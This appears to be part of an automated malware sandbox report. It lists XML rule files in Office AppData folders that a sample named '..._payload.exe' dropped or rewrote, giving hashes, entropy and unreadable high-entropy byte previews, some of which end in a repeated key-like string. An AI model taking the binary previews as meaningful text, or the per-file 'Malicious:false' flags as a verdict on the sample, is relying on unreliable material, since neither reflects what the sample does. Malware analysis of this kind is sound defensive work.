                                                                                                      Preview:.<?........b...n{[...x.q..T*_....#..3...I.D\@....o`.+.......j....p..E%..immL,..c.. .6.....^.o.;.."g..K....X.O_.x.'..L..@[>`..2....09...$.+.c.|..S_...zA,.L#..w.*.x..`...~....].L.zk...z.._..r0......b.Yf[..h......>.C=Cah.M1.xeu....].X.[.YF.G......e...........z..y..30.I..)n.C.N$)...\.o=oQ.)gU....R.i....X...&j.v'....=.yv}qGc.......kP.B...B.....R...c.....e....~V.S.......HX.u....y..\.>.N.b.?.U.[...n.AJ...X>I)E..;`/d$.Q.u..{U.....Y.l.].U.KX....m..X..n...Cw....Z\..z:.L .. i).. :'#..de;.c.W.u.j5.4B..w.n.Ge.>..D...=lR..r.|q..g..Gjw3k.....l.A..Q..............@..L.3.Nf..5....Ha.B.a..Q.e....B....E.w.. c...7.J.F/..(..6..v$.....Zv.....^}..[J[..AP.v]..ds..s..MzC.o.b.....H...*.P..s"...*...!.8^|....3......=..>..I.@.>..#i|.........N..h..Y..2...gM.O.u..*y.4.C.7................R|..Ia..R.qs,...JI.gWEO......7.2.8...9.]).....P.....E...M...[.SV...[(;N..QJ..3.sl..#^..{6...X.....56..V..|f. ~4kd..f...z...7..I..t^<K..0..r8.C.l.r.q.B..f.....$tp...c.s.Q@C.u.....SF...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704200v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1714
                                                                                                      Entropy (8bit):7.888737494762936
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:1KtgUCSGQVuntXBSKx1BEymJgZ2FonEuxZgZxMrKLvMwD:8tgUCSNVWXMKxEy+gZ2FoBZgZaA9
                                                                                                      MD5:B82CA00B7410811A6631A1E08C34DD0B
                                                                                                      SHA1:AAC1D1E404651589CDF891FE4CF4B1F74AD630D3
                                                                                                      SHA-256:5BDB813FD0D9FD1992FCA5226E1809CDA7DCBE807AE951E86809FABE13C6E751
                                                                                                      SHA-512:46A91AD7C2038EFE7C7116B7CFFC9A6EF633E5C6A68E65F9D81C17ED4D65F5DFF5B8DB946DFFBA6D3107B8741035CC8D9A846E8B97B16B6210FC3A90FF8984B2
                                                                                                      Malicious:false
                                                                                                      Preview:.<?....$.....,w...73...?.....y......6...x..../..}...[......5...N.3].......3.....r.(..1U.P.L>k"f..`;Ruo..`...3.B...?.j..)t>!...{...P.:.j....e..P...u.....{.u..Z.>S$.7.P,.G..Sg......~..|....B'.."..c...n.:..0...yK;.(_.Y....Ka....Ln/.}....Q..T.r.KJ....[.11.....Z.H..iB.. .P{..3V...a.@.T+{.\.D...;a..$.J'/`...~...3.h......BNx....N8..W?.tI&.o.*...v...??K.w...5fA1U..`.u....y_...BXS......#/.h.......>.L. .1."...O.&].G.l.x0..S..?k...e..e.T..L....i.'....v...j4x.........0...*..y.(!.]......-h".Jd..tV.....).vc.#..W.....o9...9.9;..%.r{.A2...Y.Vyqq...n..*9...d..8..q.>....8..Z.W..!.B........._.S.........p~.. 2..Z.>.p9..?b;.)...N....2|....C.I.....=r.$8.w....Oy......J...,(...D/2...O.W.#...@...N.....A.W!l...(G.Y..M6z..c....b....o..a.<..},.>.....IH.u...."...... ...Ib..+v.Wu..v...IF..`..c.+...........f...Z.J..W}...7!Q..-....~.#.........U.%.b.=ea.L.+KVA........6B..@.(d............q.v....Q..0`L-...p.&.t.W.f,E...gm.m.H/...'u59P5..HF..[.J...[..em...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704201v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1751
                                                                                                      Entropy (8bit):7.864183943355656
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:M+Wu6Onwnwcmx9RFGjn5DLZ0/ERjJobVTcXBDL5yjwD:Lp6OnwwcU+9LZLRjJUcBDL5z
                                                                                                      MD5:F0C1EB70F87B34441D10FC18D2E82A6F
                                                                                                      SHA1:13B9F5378513ECA9D46DC2EE9C77AC0D4C6908B1
                                                                                                      SHA-256:E8E2325E25508CE5FD655BD622B990636119D790CEB3CB1A8E6A1C50B4DC2BA4
                                                                                                      SHA-512:307400ACE0C1D61EDBD6FA7D00D9FB65F4D11D63CFB1876970C128BFD870A6F5AA984FDAF846744ADE9FA6A29D1274A00B375CE319514D5D0EBBDA69CF11CB79
                                                                                                      Malicious:false
                                                                                                      Preview:.<?M..WY..dr.a..&.x.....h.V.?.........../&lH...~mZ..\D.&.s2.."....?h.O.......eZ0..stb.U)~..u.+........v.y.I.....i6....4iE...siI.t...<$....rW\._....0J..5. .^...zj...{.....B.E.......GHh.b.=.P.R#D.L...ten....Y...._^.,..L.}.........-'..x.......i.7/..sm.'......E....&.9... ....{...]T.......U......G..&.8.^....o(....8u.[z.H....(...r.St.;."...../...A2...|9...4..l5.Ov0.1M.lc....;K.h.}.....'".s...b.V......$.N/.0 .m....W...f...T.Jb<...esKh.o....h....|#.......T"_.zB.BB_..v.(\P.......:}......:....7....6...|...."h9.E....:..F.N.KXGA....p1....7....;Ej.V.w.S.? .M...@.+.....].h.vZ6..b...V...}{.w......^&6.. .I.!.Y.V.6(nL.t3o..sM..3..9..i.Q.A2..5.....:.~..PJ.....B\..{.".FK....8u....x....@...I2.X.ukY.L..x>e......S.o.V.....nM.4.1H.n...n......T(.Asj...T....L?...9e.U2.3.W........{.Se..{.[.....NLWP....|...H.O3.5...a....GZ.miJ.a(8gq..EM.....a.....(.yz....&P.....J....Z.Yl.....P..T.E......Q.Y;...o......9..$.p.e.x...;..!E.$...../Pv...H.r.6......a..{.fR_@.....%

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule90401v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1583
                                                                                                      Entropy (8bit):7.859515263036728
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:6Gpn1+DyTLsXtfMWjxNNNeK5NMGVm6hAPwD:PpnkDyTLsXtfMWNNNk4MKp
                                                                                                      MD5:AE296E5BF4D233ECBD591358E53C770F
                                                                                                      SHA1:77EC3AEA21FCA12EAF8FF6B86BBF94880AF809B2
                                                                                                      SHA-256:05014529E8D2740A8C6CEA8396B5C3DA73D98505876F3140D001831E88686979
                                                                                                      SHA-512:8967C7448A5504F95480C657137959AABCFEC75E3C5E7DCF5BBCED2E87E9A1BBDA1AC98099464453340DF849605DE7D3F9130AAB0FC0CD0B0FBDD292F5D3C0D3
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.F..P...]...D.,.b...m...g...yw>..P.%...W{O.j.'.f...}X-.z.W0....~<......D.......mDg.....x]..J.}..#.....Ztz.^,.B.1.....bF...._..?....V.X..;.:.).k.g..u.<A5...`..q.Z.D.!..{..j...fHPU#....g.!....h/..Z.a..L.... I.......>q.>..d..;.....K,.._.m9.V.iL,q.._*7d..|../.../a3..m=.>.w..U..PfN"..Ka.....U.b3..\f..`..h,..%Y;....A...H..4..w..C&...g.f*G.....[Fj|14..s7iVY.\......c...... o;...%..UD@.-....R ..}.=%..<.!..%.G1.. .....%.......)_..r.>u.{;U.N0..^k}d..d.9.M1\j.o.F.*X.x./_...=P..<^.m..}8}^......H2n:..H...dE..S.q..2..S-..].C..H..m.wK.7Y.".s...j&..e..0n...Gp..!......{......Ckp......nk...w3./.r.&ak3O...........A.t.r._.>[;w.l.W_-.....'.&....t..}..4.e.^....r.B<L..k..!.f.eHE..?...rH.......e...t.^iE.f..n...."i\k$.L\...t:....V@1E=..].Z8iD9...U-..a.l..g2....>..]%..Z..Z.e.....;..P.H.*.`............i.o..CS........5..F..l..W|....S..(..[L[..@...=n)...=...D.N.$a|.t.%0@.k.U.P..k_.#...%..`N..zC.B...;..S.....?.I..$...KK....5S.!...C6....8......QG8.9?.2.p?..zd..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):361051
                                                                                                      Entropy (8bit):6.51412978449559
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:+0lpOi5IJw/mdqvwxR/1oyR87W+KeKrMUIEi3wNmswjSusSChcF9Ucp:+0lpOiaKLYLkKmCDIEiANlsSbSwcocp
                                                                                                      MD5:780DA3883561A585E23773A8C48E11AB
                                                                                                      SHA1:F1E710FF87E9DA5B588C3CABAC06FF6DB3A941B6
                                                                                                      SHA-256:11BA73E614993156F45355699BCA32ADB51B3487F061D4AD0A36284797CCAA3B
                                                                                                      SHA-512:E1FB83645C0F8379655E51FFC8D5D3E5F38042BF5EB07EFB1B3F3AB44FB8922C0114B283D6D4208636204D7169549B1E9201E56A70029E4D7E64DAB002BDA63C
                                                                                                      Malicious:false
                                                                                                      Preview:<RuleW..l.K.'*.s4bG....Y.v;Q../8._`(..:...b_`y..4...G....[;..g87X....a....f.!.U..x.....? .%.9..F.....wa....!..8...T..u...B..6r...;[.o..iQ...U..%q.;..G.,DL..~...._....N{..2.0o_......'...n.f......9.B."<...b.....a. .\..2.h..SY.....".x_.F.6...1........r.I..0...C...%..y5i..s.F....W...y....@...H.x...4..6..7NBI.Rl.yj),.)...W.b..W..\u.|.~..\....B9.?..6..:...x...&. 3...........f.H.q3f..l.R.....i..J...<Z.......xVd...$zs:.m........b(.b1*^.Pe....:....2..nN.d...99_._.nB4..*...8`JE...4......Z..r......B.h.[Y.e.....Nw..X..S.....&%>.[..y.......:........h....ou.(...R.J... .R.2.b...d....&?.q<.>Lv....N."..1.x.(JJ,.b\..%..}>.9..IpVp..G....YGQ.8z..L..@l.).l.q=0.-9)rS%.y$..+M....._..[\f.R..U....V.d.9...V.Zac.33.E...u..zc...A..B........_"....k.zC.H.T..=....w.ly.z.....so!...J.Yc..'j..l..=][_....d."....Y..Xyrzt.$.%E...UXv}........\.~........F1]f.....*@.....3.. ~.}]...R.X..<9MQ..8#..WK..j\92.I..x.].k..m...I<y...6z<....K`.."..oS.q.-q.1..T=.e....\..!n.&9..`...3~

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule1000v5.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1928
                                                                                                      Entropy (8bit):7.9015704939678795
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:F30gR/HtXvuU76ESx1qTWgjIYbJXOuCRPEYEyfHAUy0wD:1R/NXXQvUWgjI4+uWfo5N
                                                                                                      MD5:931905D3A71544C7773DA992C52C096C
                                                                                                      SHA1:2A12B1BB3B81F63A8E6DB1F24741B9F76FCC3809
                                                                                                      SHA-256:729096F4566B18D7F3BABF14EE3DBEA762C26663F7CA3159CB2226757D430D14
                                                                                                      SHA-512:459EB03DCBC6D2BC6EBE873F299439153271F8E7DD650AADA16EE189F38C6D2878CE2CDF2CC67DDE2806AC3801D8E574106D27D90633BF7103936CFD43A26EA7
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlG.;..X...~.d.@......s`O.J.s...+&.kx.r..@..yAiL8@..{3..:P%.j..g.......}.`.si..gK.u|U.i..d.c.$.h.O.....\....V...U....F#.}D...V........"@.rb.=.,..S..b..<.5.D#....y(F.....7..Ab'/..;..j..!H...] )>.=.\..\ c...,.+.HT..q..U.7...$... R).@n.D.....~.Q....g@....lK.k..Y..{...3."..o:r{ ..Xc....+^.....~4..c...!n.&..>.I.9|.>..^EL..Z..|...)......../...z......"..5c...._.w....v....j....;J_.von.B..>.Y..5.5.x.....-s...C<...&..ss<.....ME.....$.b?D..].uP.6.M....INm..f..(;.f..<Bq.......\.0~......\*k.p8g'}!...G.FrO.<.cHt.{...H...M2.8..e............y.Z........nH...^m:R.cY h......g.....^}7....r...(8.._...0.g.Sc.0...,....~B,....=..g.!....\cB.d...g..bU.P..^.....?J....'.LC....5y..._.Y..qV.~.`.fY..y.#..7.q.4.;^..B_...E.~?.yy.K;.F..a..S%'..|........z..8.>..QvO.+.3}.],v..m...>.W.......N....r....[f_"g..."q.b.^`E.45...,.W=.B.~.0!.2.i.z.....O..Y.....<.....';iV...1-..j..c..,..W[.9....zDL.....WA...Fd.6.L"f.hQNNH...ku.sPN-...I..A..6.c.%.x.5..S...l. .....Z:a<........

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10450v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1387
                                                                                                      Entropy (8bit):7.829818307457814
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:pGpxSi+AMTICDg36sjyq0bh0J7VNDLlm2YLykIrKmrXlAqta5esygvEiPGXqv6bD:pexHjN3elyvpYBAJXKTesygJGXqwD
                                                                                                      MD5:DF8A4151CDCAD3D4F6B9C9DE2439B741
                                                                                                      SHA1:372FC1AA3103A9343C1A23E53BAC9EB00102076B
                                                                                                      SHA-256:9B04892DE251EDFF6962F71686156AF6077423E34A1E95AAFF956E05B8E189E0
                                                                                                      SHA-512:9FAA99889F83B5E2349BF61BB5C510F9C1AB7E024B0A1C7E64E2237C0D65F56BD9D60C628D4DA585D1C9BAC8C95203E9EF505D8EB8FE5798422C648CF6916C95
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml;.\>..U..u...(..gs..}.N...K......4.0...'K.V5.(SY._l.0..E~..j..4...r..,...jF..T..g..g......?.X.C....Up. #..}ce.}.FoX. ...\..Bgd.c.!Z ?......../...X.D!.1.....<.q.......8...p1m..U.3..0.d.mC.M..5:..9h.$..G.^06<'.......;...'D..pi.11..(Y#..%f.G'.8|....J...S...~6......}.)h..K9....!...}gy..).H.OB...Owl.\.6..J..^....|.....FD...M..S....T7/5,...R.;...., ."..`c4.c~.ZV......5CA.&.......K.cslo....~...Qw,=..n......c.[S.W....kB.W`$..."...W....b..k?.:SWS......l.I.d.%....%o7..g.v\.../.K........&..bo.IK.m{IA._&...hZ.....[}.B..5..H...>a7h.!..aag.S..xf...8..`.wdy...5cy....;{.".'.k.,.:t.........#...mm.nQ.bs!l?A......I......~....?L....t.........c...9.......S.1...+.;..............O|v..U.=.g.\...? JV.\.&.e/O...W`..0pS......S>C..Q.h..$..uU...""bSu....w.n...Qa........u...$.Tu).Fr...."y../.h.vji..w.B...xD.Gi.......wA?..s.0w...../...Y.3...Y..Y.....I...:8...W3%m.......dME....q..z...D.r..@...3..!l}.. .".E(..*.m..c>...z.....qT.G.&X.\j..fh\".w.PJ,a!"....xg...b...K

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10625v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3024
                                                                                                      Entropy (8bit):7.93818924235392
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:mPkRQUu1ojsuSjkCXmIggzZSXlgcIJTIZblUDIjIxZdHPZmy+hD5sTzfiwD:Vnu1ruCkMg6ZS1gcIJkZ8IMxZ9Pgl6v
                                                                                                      MD5:3299FF5B45A5822B07826B878253D051
                                                                                                      SHA1:90651643F63091496798425DA421F56133AB0B51
                                                                                                      SHA-256:3A209BC4687D7071670926BED634F1B190151B3D7EC795830AF2B3571B417D0B
                                                                                                      SHA-512:A5957A2BFC0C26D7D2D2693BDDD2A84D94161A4A484E9BED44216B81389FAD7A32B7D0CBED9D727CC9A35B808B4C742DAF3EB0B1EC1FDBF2A609629E16400FE7
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..j.`/..XH..q}^.q..q.EK...t.....e.s.wS..*.SiP....[L..R*F..52o..]l.k..(i.P.-<.C.e....x2..Bi...&.SZ^....c.]...F...~...l.''.Q}...9W]WQ..RS.&.B...9...v.S..L.V...'4g7..r! .q.J.+aL.H.^G..c....H"^...v....h....+.{.p.C.u..S.$UD.'i.p.G.). ........Qtl.Lf..x_........y.D...>r.t....y.AR.......5'...M5..%.l...%./....+..XRv.WS8.R.B...{../yD"}....G5..8....\kL..l.N&`M..i...Z..h........^g!.O....[........... o..B...>ifX.[.-.1K8..... ........[B..]][....b.u.zx.....P.E+.e.R4Am...6.t.uP.'eW[......jg..a.....F..;.AAg...WB..W..k.&Yq.].p)...H............7...!..q.6#..../.37X..-..',.\W2!Q!c....f.jV.HK..K...!.0.I-....[?.T....*.GO...#\z@.3t...0K7.S\..T.Pi.j\.7V...a...K.6.t.u...t&X.~.........Zg.ou.Z.....;...].M.cXE........].L1..c.A.oJCK1.]...U..7/...x...y.Vc.x..@.{...o..........V...!.!...i.Y./-..W.*..>..X7C.........<.....cJ....~..Y^.....Rt2.9L.4Zf...B.E..Ie..y.*.1E........s.5W......H;...n.._.N.@y..K9..6...oH..=Z.d.5.+..B.D.Gr.]Vb.H_..X...L.........V(.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10626v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1675
                                                                                                      Entropy (8bit):7.872230019399978
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:nc72zMEwrnwYxeb79NfKzYamHBN3hqlUaJV9ALzys0LPMx/iEF1DuLv6bD:cD5YFMlw3seauLzVyCio1DqwD
                                                                                                      MD5:D1865FCFCAFB3ACD1C7EA8A48B9F9147
                                                                                                      SHA1:1F69B8EC1BEDCD3ABD3C0E551D2595BCB067B116
                                                                                                      SHA-256:0D7C77F940A90DAAA3A708C1DE4A48F98F55CDDDD136CD7D1CDDE471CBEDE93F
                                                                                                      SHA-512:E65A4C8D87EB24792BBC3A731AAB2736353EB57A276D678C37BF69D11973C5D6FBA4DFFC235D2342651231ADA15E9B056B600A69F2D3A6420E2BE5EB5CA6F427
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...+J{...[I}..=.s.d..'.DDWk.C.&<.8$.B..._.z.o_.6$pz......EMe..~G...T.E.u.....nh..B...P...,.r...&.VI5.....J..+7"...Gu.N.F..#o...{....'..$.......1T.G.Q.._.g.Hz.#.Z.o....H,+.}.<^........g/.5>.;.Q.eX...d..P)...n.7......lIx....a..}..s...1..=..:80&...]..n(.o.%3Ve..%.P|'U5c.|C...~u.lQ.&.|..3".Ra?.R..@...kHm...........n........pH..+...I...5..In.G.0>-p.HU.<PZ&..r.u5Z,..`+..)Z...jl......Y.i,]..S....:...-......:.0...!b..b..H...2.....!.^.....gG....[v..k..U,&.EA...o.l.[.6.q.4....p&..y......x...O.............6...].|w.Z....+.-..-..q*.FjI.K...M..m...W.9..27...qi%'PS...;....(``{.}.....!X......7.!...<Z..+...[...3q..C....(....uV..Wq-..>.G.S.QS9.hw,4Q.c ]..P.]....`/V.OSl@".....*?1..{.iw>...........S..I6k8H.f5wi.jV.~0.....c%PZ..{oR.9..F[o.4$.>...Q. 3.6..J8..FJ.e..LO .3..C.U.8..w...i.<K{a!......w|.!fyx.w1..yBB.X.s.......\........6dI../..g..2+z@~.ZbE..kJ.._..-...M...(o|Its......!K....._K.....y_.+../...YE.....i8....2.'..x.n...g/..=.W...a....t.h ..U.).

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10627v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2113
                                                                                                      Entropy (8bit):7.912931641414288
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:sqU84162x5qZnoXdasdvYSj6aStFcWVTcmEauVuP+Go6hqOwD:1yvxMKasdvJBSFcWhcZaKuP+QhqD
                                                                                                      MD5:AD0CF29147E857C91C9984C501E6DA5F
                                                                                                      SHA1:BB45DC9E9B4337AD7206DC8425A7D57CF4605722
                                                                                                      SHA-256:F4ECBF1D09716E748162597AD3F4B36C9299A51EF634F9315D1A69332E4FE318
                                                                                                      SHA-512:720E899AD2B0FAD846BF8007935A984AFA638DB99FC99F82B1DAFCCE2CB49D4B61DF6D04EA525B54CE518E28294AF7208F8E09ECF4B72DB3D3745A190BBFB07B
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml!..........N....`..9...?.....p#o...(.!.."..9.....{X6.....l?......M......V..v.9..T...v..-.&.|oN.....j......../......W..&.)..e5q 7PL..>3.Q"V^...>2..qF....*..:D......b.OR..0k..w..|...4.S:..%..._O..2\..e=......X........+E.T..}..8....y.FJ._..;..$^..0G..'.B?.......>.6l.E..Y.S$.T...5$..'LV...[.=.=....D..&. !...i.1&.....P.y.1..o.b..DH%..../..p2..^.Yw..h..i..]...y..A.UF...e.P_5.o...j.VO...,.)N..f..D U._w....r.H..D.^kN.a`._6..5...I..?..b.eG.vN..H.>...ZF"x.."...?..6.;../.....f.`.q..Y.r.(9...?.9.....9Kj.[....n..p;r..).".Z.....(....e.UU.9..D...yg..su]~....R:...v..,/.cZ....J./+.4y.re#...8.-...R.l.j..N...v.sW..y.O].s.uf*X..."AG.<8.}.C..?4.j....3...Y.."Ag..*.....p.e.".Q."s....~..)Y.D....-..Kt....M...j.*...>...5I._.0K'b6_...O......Q..(w h.Mi...W...kf.=-g.$R.b-.e...C.1.".-...a2...tt..<....Rt3.C..%.ak..jdHj#.Y..h.>..[B.G...R./..`GF.-.T....U..V...4.[......1.y.`[....m..{..v..5...@...pB}c:i.n.RZ'..D(....L{.\..........5K)/..P...v.G.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10781v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):813
                                                                                                      Entropy (8bit):7.734896466482371
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:s1erdURXRQEm0j/eRexKqap5day93o9E/m5v6bD:sVLQEmoPxRap5gM49E/m5wD
                                                                                                      MD5:73A18D25CC1EB1EBA42ABE7FAC685BB6
                                                                                                      SHA1:E598B505C5C5074DEDA2DE9D79610E7E3566B8BA
                                                                                                      SHA-256:94B9BAB9407C012C38CDB1D8A91219529DCA006EDCA14B7B6F8E3293588464E0
                                                                                                      SHA-512:F8588D7F62D777844D2EB129D99ED7EEB92AEB91DEA8DAAB0F7B8B40E57D8AFB1FB1178BFD15E7621A46FEF44707EEE145DC4188806375DF0656D9D030DA4453
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...q.$y..e.c.f.-.4..`.%.+.@>H.._....If,fs.$W....g...$.8f..6^s.Z..:[...oe.T..Y..f.(",...y..X7z'.7)4....s....$.....]|.6.y.p.=..y@>.....KCJq.`.N..)..=....^,....D.&.. .....<#I.....n.&....\............3r..p..lY..1....O...1..-......`c.!.Y.&..*...i.4.4T...+..E....~.M....m.C.;...PE.$.^.(.N....q..E. .a..`14.)w.:.r&$y..B.ym{......$&3..n.:2..}.r.;2......aB..-.}.eGH.E......;....P.f)..........}.h..V...:"V....;#.".S...vD...y.ns...:C.d...:..?D!{.Q.....q...Y...^#M...........Q.6.9..~... ...r....S}..u@.5V.x.. BY.....`...y2.L.Z..Ok..blS......h6.2...o~..5.......b36.D.,.{..D..T<.b+<h.!j......O.....F.c._E.P]...0..i...;D.3.#o...'jFo... .%.r.P....A..a.....m.8l....$...;.....DWCg.....h.DA" ...gi.9....hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10784v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2070
                                                                                                      Entropy (8bit):7.893375162268352
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:kwHhIp6n74kg91f3UVaq2X3WinXEs3tJYfKR3fs5oA0GwD:k7In74/1vUMvWUXF3tJ+useRr
                                                                                                      MD5:F435E67323587124C034768A42B78143
                                                                                                      SHA1:C0B0711F49884B3355E7EF1A39DF5C6675BA45D5
                                                                                                      SHA-256:D19D735748D3A727C59194E86EBFE0CA7EC8731E2620354DEA98C5612391BC43
                                                                                                      SHA-512:3400A1835E6611D5E6333636069B95B7B8FCD0EA1124862968F2F13C05F79775C4BC9DAA3809D0A550D5C0D2B713F1658BEF303B76896CC5962860057BD063A5
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlQ.;...d..N.q.8Z.QA$......0...4.......P.~....C...s..9{Mk...kd"..y.}I."'z.[U.r.N|E.]....jD%..m.....L.I.0.2.={..(.>kr.44h...9.......h-5.....R6dQ...|Eh....h.j.tW.F.q.1.$.$...d..?>.?4IQXGC(..k.4D.#..Al.[....^.M...QH.;/..l..=....>.zQ.<:O..."p.U.}...g...t<.[>E....#4......-....-.x..b.. ."........,..V...-........a~........F.v`.o..'.i.J.i.{.8.!I^9.I9c0k....cC.J.i.........<.O...Z...)M.>\...X.Y6.f.......^DwI....efj..GM"..d.....o.Y.Q.B.Xc......eB>.J.X.7..qJ.hqH.AH.M8......$:*..$..^*M.S.e.p)...ZO..tm.D.|..0..DL...V.-".d.I.I./.~....h........K........F.<w).Z).K....6..r..B...Y.....$b..J.[8|FX..Q.....^......I.Q..&B....A,......7.u....B....h +/.......s<;.N..P....>.*..RY...>.3.1.:...K`...s.?...d....l...k.....cMn;.f.\F.YW4.<...4.?.:ukwnti*].......|..:.8......b.._"E.....+vgjj...[..Hdmd.?!..N......l!...Q.U...g..5.<*Bw.-.....N.O.lE.Pf...@o.@g.~-5....B.O...;.D.2..\hsn....`S..Z.Ce...J..NJ.."...!5.......@Qu.1.iFZ6T^..y..XM,R.F..o....a6G9~...O..X....G.]o

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10800v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):789
                                                                                                      Entropy (8bit):7.687569429795253
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:+l9dOHFAqCzvSEO51fXMnx7QyBK2I9O2WVW9v6bD:+AlAqMb21fXMxdK2IF9wD
                                                                                                      MD5:D5545F45C18B5DDFBAD2129D753E352B
                                                                                                      SHA1:05ECE7815D988B5FD03B6E27D2B5860313333CE8
                                                                                                      SHA-256:111B2B70D770E09A4831C1BEDA4F2A041E3FA4A46C833A0AED437E29F31071AD
                                                                                                      SHA-512:63B2A972625E4294476F19FE34425655D9B97B3F205E2631DE2866068C95057BECB3AE1AAF6284F3E3000928B26440EDD0A13F92E97C80D4B37A16335B8FB52E
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml^.t...hzHQ..J.2..i2...=..!%*9...n..G}.=..O.B...A.d.\a...P..Mz..8DFr#:..v..t.;.|..^..M T....E.A@L.M..s..t.].'.l....I.Q......*....K.j...R..H.2X.R*....S.V.e.K.s.%&....yF.....I.Q..p</..-}..{..%qK..?r.L./../......I@h.....Z...S-....[.p..yF^.!.ea..%K\Td.c.XW.....|....tSn_.k.....1ghs.s..j.z.T..2k.N..r{..N.....@F...Ul.......lC..T..-..n.P,.t..m.)t.).rT[E....5.#..uo.ptj.H[.Z.e..NlCF..j..[.H...^.y...dJT.k..M....D......0..L8..U...+g..M..%}.R..x...;...t..H..].....W.g|<.......$. ..jS.......oR.Z.......X.A-..........A;U.L9.&..di@....B.F..b..t..g.r....i....K.0G..i..Z\..W?.&..^p.V.........H.^.6.M.....4Q>..A.(f8..G.gm*.\...G6.6hy.v..8j..~.d...]...&5'.AF.....+m.)~....Y^...B.......K.05l..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10801v0.xml

                                                                                                      Download File
